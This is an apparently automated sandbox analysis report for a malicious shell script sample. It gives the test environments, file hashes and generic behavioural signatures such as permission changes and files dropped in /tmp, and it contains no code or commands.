Analysis
max time kernel: 91s
max time network: 93s
platform: debian-9_mipsel
resource: debian9-mipsel-20240729-en
resource tags: arch:mipsel, image:debian9-mipsel-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 14-11-2024 02:50
Static task: static1
Behavioral task: behavioral1
Sample: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
Sample: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
Sample: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
Sample: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Resource: debian9-mipsel-20240729-en
General
Target: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d.sh
Size: 10KB
MD5: aae1d5abee7934f0e4222cffef0b2329
SHA1: 068230ae72391a90d17b4f8c26d9665b3c7971be
SHA256: 9ade68ec0497dd46a36212dd78c933228c8877ecc0a5d5054b8cc4a4ca4e930d
SHA512: 1e9c830304e2aded2bd79e88b10a4af93cc50ac5e1b627a042727a17d92546e521a2d20b99af77a18a60d8cef82498eb9295bc3d340fc76b38930b6e5356fc2b
SSDEEP: 192:qovj7zA0N1Bx6yhxSWD8M8FBSSGgAap+mX4DGgAap+mXmDV8M8FBSHFj7zA031Bg:qovj7zA0VxV5SWZDWVDzlj7zA0c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Processes:
curl: File opened for reading /proc/sys/crypto/fips_enabled
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97